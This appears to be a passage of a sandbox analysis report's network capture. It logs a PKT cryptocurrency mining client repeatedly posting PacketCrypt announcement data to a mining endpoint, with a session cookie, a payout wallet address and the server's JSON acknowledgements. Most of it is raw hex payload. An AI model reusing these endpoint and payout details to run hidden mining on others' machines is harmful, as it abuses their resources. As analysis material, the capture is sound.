Jan 7, 2025 13:59:45.491800070 CET	4944	OUT	Data Raw: 2b c9 db b7 c6 2c bd 07 8d 75 2d cf e3 0a cb 13 d8 ec 1d f7 d1 07 b1 67 75 f5 4d 42 e5 76 34 97 cf 40 04 23 cc 61 44 3d 2e bd ec 29 9f d2 df d1 4e 4e 48 b9 b9 8d 59 67 51 7f e8 87 2b 88 00 18 f2 3b 77 7f 50 fa 50 24 99 17 27 da 4f ba f1 5e a9 63 Data Ascii: +,u-guMBv4@#aD=.)NNHYgQ+;wPP$'O^cs.(y(HzAum@hv(VlJc.R]`Pj0I\|/F>nAE5nbS(x5V\|sF\|F[7WNqels1.K.cdv
Jan 7, 2025 13:59:45.491899014 CET	4944	OUT	Data Raw: 4f 06 a7 41 bb 5e 03 9e 0e 17 68 91 69 6f 53 b9 56 63 ea 53 1c cd f6 05 9f 8d fb ce 84 64 be 6f 6c aa 4e 7c c0 92 bd 52 33 62 5f df 52 9f 60 36 0e 8b 40 4c 4b 2c 15 d4 2d 80 dd 2d 5a 7a 70 51 c2 5b 14 11 63 68 a0 19 c2 fd 0b 3d c9 8f 9d 27 a3 41 Data Ascii: OA^hioSVcSdolN\|R3b_R`6@LK,--ZzpQ[ch='A\Uu[f6Zeb9Rt+'e0ubE_phytI\*dguZkEKO7jff\|uyQM09Q7[ Q:
Jan 7, 2025 13:59:45.491938114 CET	2472	OUT	Data Raw: 72 5e 83 e7 5a 32 7b 65 09 85 38 52 34 eb ab 94 38 54 e8 2a 35 0d 88 ab 96 ad 5b 2c e0 48 2e 93 59 db 35 98 2a 98 38 80 28 11 02 c5 b4 7a 6d 05 c5 39 38 df 3a e3 8a 5a 17 f0 a0 33 2a 38 7a 7d 00 53 67 d5 36 3b 2e 45 00 b8 ed d6 e8 01 41 a4 25 9e Data Ascii: r^Z2{e8R48T5[,H.Y58(zm98:Z38z}Sg6;.EA%B#Yt$O~@,O_6`T1b\j,RO\A;K(?O%f=Qc}Rl-4H\,b8$Ip
Jan 7, 2025 13:59:45.496473074 CET	2472	OUT	Data Raw: 97 e1 be 74 c9 66 db ca 9b 8a ae 66 d3 6c 66 7f a3 44 b5 c5 88 49 34 09 ee 73 cd ea 01 8e 6d 8a ff 48 63 6a e3 5c fa b5 45 f7 18 7e 8b 89 61 8e e9 a9 2a f9 9d d6 74 dc c9 b6 5f 6c af dc 66 ab 3b c7 6a 14 6c dd 8f 1b ff 09 e9 e0 96 95 99 ca a6 38 Data Ascii: tfflfDI4smHcj\E~at_lf;jl890"fGR~""}[xpl/69Qh_NRZa1C@!sPxD>h.*mmYd 7y<)&
Jan 7, 2025 13:59:45.496490002 CET	2472	OUT	Data Raw: 93 1c ce 9a b7 ab 71 8c 07 38 12 ea 60 33 49 05 d3 3c 44 e7 32 cc 80 b9 5c 2b 9c 56 58 c4 87 96 35 d4 0d 0a 34 30 30 0d 0a 01 5e 32 0f 4c 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: q8`3I<D2\+VX5400^2L\|ChJ+Tj1)B,j0:qAkv>(t)[TG]%frfSc)XtW#8!}z/%&;]npieD2V-"
Jan 7, 2025 13:59:45.496622086 CET	2472	OUT	Data Raw: e1 34 7b de b1 9a df d3 03 53 c0 af 99 2e 27 49 dd 48 c4 68 07 41 4a ab be 7e 3e 4a 80 0e 16 bf 8c e5 c3 98 46 74 99 53 94 43 61 35 d8 98 de 83 cc 6e bc e3 ad 1b 72 2a 7b 28 62 f9 ed 61 d8 ef 5b 5f a7 75 ec 31 2f cb d1 14 9c 05 39 f6 21 b0 99 6c Data Ascii: 4{S.'IHhAJ~>JFtSCa5nr{(ba[_u1/9!lqY%=TG#6`,fv\Im^&V+;e~{x9e9w=vg }(Q@M<nor\|\|"tw8
Jan 7, 2025 13:59:47.170991898 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:47 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 33 38 37 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 33 38 37 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 38 37 30 38 34 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 36 2d 41 32 44 41 30 37 32 35 46 33 32 46 34 44 30 34 36 42 45 46 35 33 43 36 32 34 30 32 30 38 38 43 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":387,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":387,"totalLen":0,"target":521618356,"time":1736254787084,"eventId":"cah-2837096-A2DA0725F32F4D046BEF53C62402088C"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:59:55.407736063 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837098 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 13:59:55.407808065 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 8a 05 00 4d 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400M\|CiJ+o$E[&M5LQcSEcim^o[K^bowLiKsU~\jL9XD$jqFo8vH E!o6KKiO%G^
Jan 7, 2025 13:59:55.413759947 CET	3708	OUT	Data Raw: a1 e9 4f 8c 30 96 bb 02 74 f6 ac ce b9 d3 27 49 aa d3 ad cd 70 9f e5 0d 7e 44 18 62 c2 ef c5 f7 4a 97 e7 ae b6 19 b5 54 a0 74 e6 0e 47 a2 b5 52 cd 01 56 ed fb 1a 87 af 6f 5c 81 44 ce 2a 1d dc bd fc 64 40 1c d7 67 a8 80 bd 3e de 87 06 a1 43 cc 8b Data Ascii: O0t'Ip~DbJTtGRVo\D*d@g>C07+\$/g+%L+eN6[@PGl+,r(4^A)o FCzi.LUd``2gRFX400WDL\|CiJ+
Jan 7, 2025 13:59:55.413800955 CET	3708	OUT	Data Raw: ee f6 b9 47 d1 79 bb 5a b7 34 f9 cb 4d b8 2c 6b 16 77 79 f7 61 70 42 0e d3 9a 68 49 6f 3e 7e a1 e7 50 d0 3b 96 a7 45 43 63 34 58 0f c7 7c ff 66 9a 84 c6 76 73 1f ce 14 bb e4 0f a8 af 01 6c 16 54 38 a1 17 af 0b cf 43 ce 11 a0 ee c5 e9 9f 80 64 52 Data Ascii: GyZ4M,kwyapBhIo>~P;ECc4X\|fvslT8CdRkq&b+fhe\\y<0_n4sLUq]oxGUh\|Vv*xM+\?!j"(S}:fvAFE[D(m'.1ZnPQ!Nt8dcp
Jan 7, 2025 13:59:55.413814068 CET	1236	OUT	Data Raw: 6b b6 37 f1 02 18 fd 07 7f 85 fc ef 21 6a 67 d0 0d 0a 34 30 30 0d 0a 01 cd 26 00 4f 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: k7!jg400&O\|CiJ+(Ph\|YDxyq2QbR}&QaI$$67xXqf.N&;}6gz&SOMaLn_VGk6r,1
Jan 7, 2025 13:59:55.413865089 CET	14832	OUT	Data Raw: 66 62 b7 d8 9f 36 35 ef e4 7b 45 bf 50 e4 71 1a 16 29 56 0f ab 46 e6 6e 5d 63 25 7e 07 be a2 c6 ab 5e 72 3a 4a 79 90 f1 f7 7b e6 3e 78 f7 1f b0 cd 1d c4 08 72 34 69 3e 63 b6 11 20 a3 86 f8 ae 5b e0 fb b6 a2 c1 e5 b9 84 d6 39 76 b8 72 d7 36 7b 99 Data Ascii: fb65{EPq)VFn]c%~^r:Jy{>xr4i>c [9vr6{YoG:g-lT@"l%2GZ20=vb#g(9&Aw6Y',[7kH@YzSotc$H"k$fP7"!63lnSk
Jan 7, 2025 13:59:55.420680046 CET	2472	OUT	Data Raw: 49 d4 f1 80 d2 c5 89 93 1e de e9 61 95 55 c2 3e 52 4a 2d bf f6 ec d0 57 a4 24 36 97 a2 8d 26 19 72 bf 9d f3 c4 a9 d3 89 04 58 66 21 8c 22 ba a6 02 81 e4 c5 61 ba af b5 46 d8 ba 91 cd d0 b4 bb 2f bc e3 b5 56 32 d2 4b e4 fb 16 59 4b 3c d4 46 f4 97 Data Ascii: IaU>RJ-W$6&rXf!"aF/V2KYK<F=XA/aGcR%@gbVtu*_`2J_d;/o8e=uktcyLGVT&u=5y6wOM)be`j6(g5{Qn_0Q
Jan 7, 2025 13:59:55.420707941 CET	7416	OUT	Data Raw: e9 e2 f1 dc 23 1b c0 af db 03 3f 91 3e ae 57 5b d6 1d a2 1e c0 f6 9e 36 04 60 4a 80 94 39 34 e3 fc 66 0d 0a 34 30 30 0d 0a 01 9b 50 00 4f 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: #?>W[6`J94f400PO\|CiJ+IKbw` >.u&wCw!Lrh[LH>.;X_50/OFo>XTRF(2
Jan 7, 2025 13:59:55.420800924 CET	4944	OUT	Data Raw: e4 b5 d3 6d 9d d4 54 08 de 65 0f 0c cb cb 18 06 03 15 61 67 bf fc 45 a4 63 a1 2e 82 71 bb 4c 34 a7 84 e8 1f 1a 25 20 3a 5c 22 ed 14 bd 7e db eb 75 f2 19 d8 87 b3 ef af 60 e5 d5 47 cb cc 53 66 e0 cf 53 16 dc a1 20 ee 95 2f 6e c3 05 74 98 77 dc 6a Data Ascii: mTeagEc.qL4% :\"~u`GSfS /ntwjBNIAYfBd&x;rREGj^e-gT3IIocer!%\|PYg}A]_R(I)9[,m<]N*>s)bk~![Ny Z3$=~dw- ^
Jan 7, 2025 13:59:55.420825958 CET	4944	OUT	Data Raw: b6 b1 6f 20 46 d8 86 e2 1f c7 c1 47 77 bb b3 2b 64 9c dd db e0 c8 bc cf e6 6a e0 7b 80 e3 b4 23 c0 6e ee 28 14 8f bb 8d c9 cf b9 a3 15 6b 0d 0a 34 30 30 0d 0a 01 87 c8 00 4d 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: o FGw+dj{#n(k400M\|CiJ+;xxd[-3DfT!3c0"~%Ww=v7D18#ty-;UaV<m
Jan 7, 2025 13:59:55.420968056 CET	4944	OUT	Data Raw: dd 9f 51 83 49 97 36 67 88 94 ae a0 f5 39 82 27 dc 9a 17 50 e0 af c2 35 a0 b9 ee 80 f7 3a 17 52 80 81 0d 53 a4 3b 4d be 2f 09 8e 85 ab b5 9c 8d 4e 48 9a 77 d2 23 52 f3 fa c5 8f a0 60 cf a2 5f 04 d0 45 60 29 31 e8 40 f7 80 34 cf 55 a2 5a 39 2d 1f Data Ascii: QI6g9'P5:RS;M/NHw#R`_E`)1@4UZ9-][D+Xa)9h&+Za)\|'-ND2l3"`-KxGa0nMKoa6v?>/L7u.'#;QN`\|
Jan 7, 2025 13:59:56.107081890 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:56 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 31 37 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 31 37 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 39 36 30 31 35 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 37 2d 39 35 38 41 31 34 35 33 31 43 45 38 33 31 43 45 43 44 46 32 37 44 45 46 33 37 30 32 34 44 42 45 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":517,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":517,"totalLen":0,"target":521618356,"time":1736254796015,"eventId":"cah-2837097-958A14531CE831CECDF27DEF37024DBE"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:00:09.922821999 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837098 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:00:09.922880888 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 2a 59 0a 4c 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400YL\|CiJ+Hn]rY~\_N8Q)%9]/w3q;po6qRh?'xtvkxY-0%0y;69E#sddN\|>)OlQv_[
Jan 7, 2025 14:00:09.927839994 CET	3708	OUT	Data Raw: 16 4b db 72 63 c4 f4 40 28 8e 3c 5f 36 de f1 9b 7f 39 cb 40 cc 2f 3f e1 7b 3e b9 20 2b cd fa 4a 51 80 96 d6 4e 9d da d6 c4 e7 bc c4 c0 60 5d 3a fb d5 07 a6 c3 a6 97 ed 62 f6 37 f5 f6 87 d9 34 46 6a d8 54 c0 d2 d7 a8 4a ae 98 ff 5d e0 f2 a1 b8 59 Data Ascii: Krc@(<_69@/?{> +JQN`]:b74FjTJ]YXo>k[=+=)Jz\|l3"`-KxGa0nMKoa6v?>/L7u.HHvIgp400oL\|CiJ+
Jan 7, 2025 14:00:09.927859068 CET	4944	OUT	Data Raw: 27 bd 01 53 8c 99 a5 e8 6b 4f 82 65 cb e0 4c 7c f0 03 4a 5f fc 61 59 13 97 5c c3 64 fb 26 0d e5 7e be 8e ff 74 8a e4 e8 2d 7e 2a b3 3c dd e9 85 73 2f 61 c1 46 5d c9 ad ef 8e 46 2e 52 2a e9 23 43 ca 4c 82 75 ba a0 81 1c a3 d1 d6 1a ac 06 22 f1 5f Data Ascii: 'SkOeL\|J_aY\d&~t-~<s/aF]F.R#CLu"_s';6'`=5BlqV8cTdO]:o0hlSlI}2KvLLWwaCygiI^'a :&IA-3q^Gx]5\w];xC
Jan 7, 2025 14:00:09.927997112 CET	4944	OUT	Data Raw: 4d 72 ac e2 31 a6 10 ad 67 79 37 b6 14 1b 2d 22 e2 f2 76 4e 25 40 15 c8 e6 38 af 87 41 82 bc 7c 02 61 0a fe 43 b1 45 fb d3 9d 65 0a 68 94 13 bc 48 40 0a 70 0b ed 66 af b0 de 4d e3 85 68 90 ef a1 19 8e 7e 73 f4 8d 08 59 ea 54 b8 e7 50 a6 d7 17 a6 Data Ascii: Mr1gy7-"vN%@8A\|aCEehH@pfMh~sYTPh mUo@Y\1/$8yXd/xm}D;[$I2>j,L<l5=QM{w\\u\V&C69m*PGgZ(GB%qPS;q
Jan 7, 2025 14:00:09.928071976 CET	4944	OUT	Data Raw: ab 57 db 78 ae 35 79 ee 23 3a ef 35 87 01 ab 51 e0 7c d5 51 d2 e9 0d 0a 34 30 30 0d 0a 01 4a 04 0c 4d 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Wx5y#:5Q\|Q400JM\|CiJ+"-<[W5)AtUGseBgo5d&F8KCLhr3T~O+\|4-B}dx%R
Jan 7, 2025 14:00:09.932528019 CET	2472	OUT	Data Raw: 4e 4b 65 e5 1a 77 16 9f fd be a3 5e 93 0c 88 4f 58 67 e8 e2 32 b2 f2 82 ab a9 b4 17 0d f6 9f 40 b9 70 64 1e fe e8 5a 7d 55 0a fb 3e 5b 34 dd bb cd 7c d9 69 ff ed 96 91 2f 81 ec 93 25 37 06 a2 24 8a 57 e7 1b 51 26 10 f0 30 3f cf 9b 87 a1 72 7e 0d Data Ascii: NKew^OXg2@pdZ}U>[4\|i/%7$WQ&0?r~-"?S(dXzX9-GL.6jl3"`-KxGa0nMKoa6v?>/L7uG@oCx#iJ_ta}K400>
Jan 7, 2025 14:00:09.932563066 CET	2472	OUT	Data Raw: 23 e8 3d 29 bb e4 a6 d4 00 ac 84 a0 74 4f b2 df b3 d2 b5 df 54 48 a4 42 ae 44 80 e0 43 ec 74 a6 4a 3e b7 23 f9 b4 bb cd 99 21 b7 40 ed 04 97 4a c3 5d 9e f8 c7 d3 38 e7 62 1c 2a da 61 a2 6c 10 dd 3a 57 e3 20 64 5b 0f 00 e1 57 cf ec 86 51 6c cf 98 Data Ascii: #=)tOTHBDCtJ>#!@J]8b*al:W d[WQlTM{P% BoK!Y0;wjILN:3%Bx]AX\|tUKUE8qKIzwW]:tI0x_Uo:bmDkY0N$G7jAT
Jan 7, 2025 14:00:09.932683945 CET	2472	OUT	Data Raw: e7 95 d4 55 ee be f0 f8 c1 2e b9 d0 3d 5d bb ae 91 68 78 c3 44 ce 22 b1 58 d4 5a 47 2c 49 53 fb 95 c6 b2 02 b7 9f 79 d8 9e 8f 60 07 d9 db 01 27 3b ca 48 b6 8f 4b 73 b1 2c cf ae ae 25 61 af ab e4 47 4c 74 42 86 34 a7 d4 d0 ce e7 5f b9 fb 2b 6a 07 Data Ascii: U.=]hxD"XZG,ISy`';HKs,%aGLtB4_+jb1ZK=A$K[$OQNy%h*H'k1F7knUCR"@oD}XEG'[/<K-%1H_i1!#drgoh(zX
Jan 7, 2025 14:00:09.932751894 CET	2472	OUT	Data Raw: 2c 3c 73 f0 97 a7 54 14 f6 82 0e 47 e8 f8 35 fc a3 33 76 4d b5 1a b5 c6 21 2a 46 20 d2 5f 99 a9 da 5c 0d 0a 34 30 30 0d 0a 01 83 f9 0b 4e 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ,<sTG53vM!*F _\400N\|CiJ+}('-uf<MlPsDU~E^J&Q\|4I_/5<v1EzT'3rTz-<\|Z
Jan 7, 2025 14:00:09.932769060 CET	2472	OUT	Data Raw: d9 e4 98 7e ea 29 c4 9f 0a ad 78 f9 90 e4 de 14 42 45 b1 ae cf 24 5b 9b f4 17 98 cd 92 ab ba 4f c4 93 17 d5 90 36 58 37 b9 76 46 bf 67 35 b0 55 74 0f 43 f6 6d 12 c1 39 9a 90 55 fb e6 24 bd 94 fa b3 14 2b 8d 3e 6e 2a d5 92 50 a6 51 a3 c1 13 cb 40 Data Ascii: ~)xBE$[O6X7vFg5UtCm9U$+>n*PQ@%e V+sql\{nj92'g_rl\|0MNCVe@MV\|;s][dq?_2Ur'(726"pC>umW]5Nnn"nurKh
Jan 7, 2025 14:00:10.891601086 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:10 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 31 32 36 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 31 32 36 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 31 30 36 38 36 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 37 2d 41 46 30 38 44 46 37 30 42 36 32 41 32 43 31 36 45 30 36 44 42 45 34 46 30 32 38 44 37 41 44 45 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":126,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":126,"totalLen":0,"target":521618356,"time":1736254810686,"eventId":"cah-2837097-AF08DF70B62A2C16E06DBE4F028D7ADE"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:00:19.766782999 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:00:19.766849995 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 36 06 00 4f 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4006O\|CjJ+E0\E=F*^Srl'\|>4>a<`ZG:?7<K71tK@.)`rb !Kd
Jan 7, 2025 14:00:19.771763086 CET	1236	OUT	Data Raw: 9a 88 0a 5c 54 9f 14 5c 84 23 75 2b 73 ce 83 bb 0b 91 47 c2 92 a0 0e 54 b0 a3 36 3f 79 74 2d 1a 22 27 da 77 ed 88 1a f6 26 87 55 f0 2d ef 74 84 03 21 80 a7 2c b2 af b2 ce 9b 31 e8 d4 4f 97 e2 ca 29 b2 b6 5e ff 65 05 11 8d 18 b2 67 96 2b fb db ab Data Ascii: \T\#u+sGT6?yt-"'w&U-t!,1O)^eg+{&1] p7Z}%opT&.?v5``5?TM.zxv`'w~&INF>~)k(.K`&H.$/{3C400m"M\|CjJ+
Jan 7, 2025 14:00:19.771786928 CET	2472	OUT	Data Raw: 03 ac b6 8f 64 03 c2 68 2a 68 0d 0a 34 30 30 0d 0a 01 06 29 00 4d 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: dhh400)M\|CjJ+l@8\|"m},dyd7p+D_AdRxB0]aalyt#W9(m#&,b*\|5h\|I
Jan 7, 2025 14:00:19.771811008 CET	2472	OUT	Data Raw: 25 3d b0 4f 65 8c 18 e3 ec 87 bc 54 6f 6b 3e 78 c1 be 8e 35 4a 3d 0f 81 22 3e e9 c7 92 9e 77 9b 8e b1 b2 91 dc 5e fe fd 25 77 96 1f bc ff 7a 99 b0 ad ea 9b 09 67 d6 70 94 25 96 4d d0 e1 77 90 29 21 27 29 f1 e1 72 53 ea 99 a2 a2 e9 85 c5 b4 b7 33 Data Ascii: %=OeTok>x5J=">w^%wzgp%Mw)!')rS3I<[?!}w"YC!S!lNG;-c9IdFhez2\n&dJ:$&_$)5oh?<#V6:7$rfE
Jan 7, 2025 14:00:19.771833897 CET	2472	OUT	Data Raw: a6 18 1f fa ac 8a 08 e8 49 33 73 59 8f cb c5 77 02 f4 8a 02 1c 97 d5 ec e3 aa 3a ba 03 7c e1 a2 26 dc 89 2e 32 7b a6 ff a5 6d 81 6d 24 90 24 87 45 68 e2 38 a9 a0 d9 d8 79 3d 2c 03 23 89 dd 82 77 e4 f8 17 0c c0 1c 48 c1 cc 89 dd 08 7a 84 9b 81 4d Data Ascii: I3sYw:\|&.2{mm$$Eh8y=,#wHzMuyW$MN5?o9}@.?_=ddy}pr,?s8KMeNX7fT>Lv^lVLOB[nUn^<?400AM\|CjJ+
Jan 7, 2025 14:00:19.771928072 CET	2472	OUT	Data Raw: 9f fc 0d f3 e8 c0 4e dd 51 0c f6 1b b0 eb 35 36 33 3e 16 9f 0b 73 88 cd 23 eb 05 a3 ad ae 93 d1 34 a1 19 78 1e 37 5a 27 c1 cf 1c fc 1c b2 7c fd 55 ff d8 0c 25 06 8e 3c 0d c1 11 ea 58 36 5e f1 97 ca 0e 80 ac fd be 94 98 d3 4d 9d 59 d3 74 ec 13 ce Data Ascii: NQ563>s#4x7Z'\|U%<X6^MYt]KU7qbK&cOOmoE^!hp%W0i<;Ep17~&Ytw(3?N[o?PE Ys=w3bVyyf66j%$
Jan 7, 2025 14:00:19.771967888 CET	2472	OUT	Data Raw: 2c a2 5d be 84 4a b3 52 b0 90 c9 b7 8f a8 3e 9f 01 45 76 9c 20 98 ac 74 8a 5c 93 b4 a4 16 17 7b fa 42 28 bc c2 e6 80 6d dc 48 57 db 06 22 b6 9f 05 bc 54 a9 1d d2 71 b9 cc 9e 8f 71 85 22 5b 4c ba 61 26 ef 02 8e 20 82 c0 29 ba 88 76 cb bb 0d 09 fa Data Ascii: ,]JR>Ev t\{B(mHW"Tqq"[La& )v'ZE EjRUwV~-JuA?Y^}/r0#\|dw(kO^ ulZdk,/{:}SCeB2Vr+g#i;_4Y4m}
Jan 7, 2025 14:00:19.771992922 CET	2472	OUT	Data Raw: 9a 45 14 1d 01 9a a2 cc b0 a3 3b c5 6e 1d 26 e7 0e c5 fe 4c 1d 21 0d 0a 34 30 30 0d 0a 01 a3 53 00 4d 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: E;n&L!400SM\|CjJ+'\|_YpbJWK{y~sTw{JF#`~E y/qN!B}v7CK%z \|`z}\|
Jan 7, 2025 14:00:19.772077084 CET	2472	OUT	Data Raw: 23 a5 5f 57 38 cd 0f bf 32 33 6f ed 7c cd 28 ac 15 ca eb 7c 0d 9d d1 0a 6c 43 bb fe c9 bc a7 1d 93 46 59 0b de cc 17 bd 55 db ee 4f 38 40 70 1a 4b 17 3c e8 00 8e d7 a9 4a 14 db 1b 08 af 7c 66 12 fb 4a 4a e2 59 10 a2 73 2b 46 78 b8 ba c9 27 cc fc Data Ascii: #_W823o\|(\|lCFYUO8@pK<J\|fJJYs+Fx'wR''Mw\|!_J:r';c-+\|FQ675!X7TQV\|=_W58p&e?JX/24#UIK %_c*Iw5~&nu
